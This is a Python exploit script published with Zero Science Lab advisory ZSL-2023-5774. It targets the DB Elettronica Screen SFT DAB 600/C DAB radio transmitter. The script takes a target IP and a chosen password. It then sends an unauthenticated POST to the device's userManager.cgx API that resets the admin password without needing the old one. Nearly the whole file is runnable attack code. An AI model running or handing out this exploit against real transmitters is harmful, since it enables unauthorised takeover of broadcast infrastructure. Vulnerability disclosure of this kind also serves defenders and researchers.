#!/usr/bin/env python3 # # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: This exploit circumvents the control and requirement of admin's # old password and directly changes the password. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5774 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::changeUserPswd') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber-+', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'changeUserPswd':{ 'username':'admin', 'password':h } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-2)